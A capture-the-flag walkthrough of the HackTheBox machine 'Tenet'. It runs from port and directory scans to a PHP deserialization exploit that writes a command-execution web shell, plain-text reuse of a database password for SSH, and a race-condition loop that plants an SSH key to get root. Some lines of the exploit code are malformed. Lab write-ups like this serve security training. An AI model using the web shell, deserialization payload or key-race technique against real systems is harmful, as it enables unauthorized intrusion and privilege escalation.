Summary

Tenet was a medium difficulty Linux box by HackTheBox user egotisticalSW.
Initial Enumeration on the box reveal a sator file and a backup file which show us an Deserialization attack vector using which we can write a file and get a reverse shell.
After getting the box we find DB Password checking that with user we get a shell as user neil. We check for sudo -l we see we can run a enableSSH.sh without password.
Checking the script we see we can grab root ssh key as the script it copying that to a tmp file(Race condition) and then deleting that.

Initial Enumeration

nmap

# Nmap 7.91 scan initiated Mon Apr 19 17:02:49 2021 as: nmap -sC -sV -oN nmap/tenet 10.10.10.223
Nmap scan report for 10.10.10.223
Host is up (0.096s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 cc:ca:43:d4:4c:e7:4e:bf:26:f4:27:ea:b8:75:a8:f8 (RSA)
|   256 85:f3:ac:ba:1a:6a:03:59:e2:7e:86:47:e7:3e:3c:00 (ECDSA)
|_  256 e7:e9:9a:dd:c3:4a:2f:7a:e1:e0:5d:a2:b0:ca:44:a8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 19 17:03:02 2021 -- 1 IP address (1 host up) scanned in 12.67 seconds

Lets start with port 80

Web

Opening the page we see an default Apache page

Checking the page with vhost as tenet.htb

which look like a wordpress site. So I ran wpscan to see if we get ant information

checking the page we see a post Migration

We’re moving our data over from a flat file structure to something a bit more substantial. Please bear with us whilst we get one of our devs on the migration, which shouldn’t take too long.

Thank you for your patience

and also saw a comment from neil as

did you remove the sator php file and the backup?? the migration program is incomplete! why would you do this?!

lets run gobuster to find sator.php

gobuster dir --wordlist ./word --url http://tenet.htb -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://tenet.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                ./word
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2021/04/19 17:23:30 Starting gobuster in directory enumeration mode
===============================================================

===============================================================
2021/04/19 17:23:31 Finished
===============================================================

and we don’t find that anything but based on the post i thought sator is put on different subdomain so i added that and checked

gobuster dir  -w word -u sator.tenet.htb -x bak,backup,swp
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://sator.tenet.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                word
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              bak,backup,swp
[+] Timeout:                 10s
===============================================================
2021/04/19 17:47:41 Starting gobuster in directory enumeration mode
===============================================================
/sator.php            (Status: 200) [Size: 63]
/sator.php.bak        (Status: 200) [Size: 514]

===============================================================
2021/04/19 17:47:42 Finished
===============================================================

Downloading sator.php.bak we see sator.php have a get parameter arepo

<?php

class DatabaseExport
{
	public $user_file = 'users.txt';
	public $data = '';

	public function update_db()
	{
		echo '[+] Grabbing users from text file <br>';
		$this-> data = 'Success';
	}


	public function __destruct()
	{
		file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data);
		echo '[] Database updated <br>';
	//	echo 'Gotta get this working properly...';
	}
}

$input = $_GET['arepo'] ?? '';
$databaseupdate = unserialize($input);

$app = new DatabaseExport;
$app -> update_db();


?>

So I created a serialize object to

<?php
class DatabaseExport
{
	public $user_file = 'f3v3r.php';
	public $data = '<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>';

	public function update_db()
	{
		echo '[+] Grabbing users from text file <br>';
		$this-> data = 'Success';
	}


	public function __destruct()
	{
		file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data);
	//	echo 'Gotta get this working properly...';
	}
}
PAYLOAD=urlencode(serialize(new DatabaseExport()));
system("curl http://sator.tenet.htb/?sator.php?arepo".$PAYLOAD);
?>

which placed

$ curl http://sator.tenet.htb/f3v3r.php?cmd=whoami
<pre>www-data</pre>

Which get us a shell as www-data

checking wordpress wp-config.php

we see the DB-Creds

User (neil)

$ sshpass -p Opera2112 ssh neil@tenet.htb
neil@tenet:~$

Checking sudo -l

we see we can run /usr/local/bin/enableSSH.sh without password

Checking the script we see it is creating a temp file and copying the key to /root/.ssh/authorized_keys

Look like a race condition to me so i ran the below script which keep updating the /tmp/ssh*

while true;do echo "ssh-rsa public key" | tee /tmp/ssh* >/dev/null; done;

and ran

sudo /usr/local/bin/enableSSH.sh

ssh -i root root@tenet.htb

which get us root